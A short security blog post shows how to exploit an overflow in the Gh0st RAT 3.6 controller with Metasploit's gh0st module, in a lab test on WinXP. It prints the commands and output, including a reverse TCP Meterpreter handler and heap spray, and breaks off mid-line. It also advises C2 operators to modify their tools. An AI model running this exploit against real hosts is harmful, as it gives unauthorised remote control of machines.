title: Using the Gh0st 3.6 Remote Overflow Vulnerability to Take Control of the Attacker in Reverse
comments: true
toc: true
categories:
- [Metasploit]
- [Exp]
tags:
- Metasploit
- Overflow
- Gh0st
date: 2020-01-12 18:30:10
abbrlink: 30568
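Preface
The proof of concept for this vulnerability was made public in 2017, but in fact several Gh0st overflow vulnerabilities had already been disclosed as early as 2009.
This shows that using an open-source C2 tool is not necessarily safe. It is best to modify the tool yourself first; AV evasion alone will not protect you.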
MSF
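Tested on WinXP at 2017-09-15
Run the Gh0st client, then use MSF to overflow the machine running the C2 client. This gives you access to the attacker's machine in reverse.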
msf > use exploit/windows/misc/gh0st
msf exploit(gh0st) > set RHOST 192.168.1.126
RHOST => 192.168.1.126
msf exploit(gh0st) > run
[*] Started reverse TCP handler on 192.168.1.125:4444
[*] 192.168.1.126:80 - Trying target Gh0st Beta 3.6
[*] 192.168.1.126:80 - Spraying heap...
[*] 192.168.1.126:80 - Trying command 103...
[*] Sending stage (957999 bytes) to 192.168.1.126
[*] Meterpreter s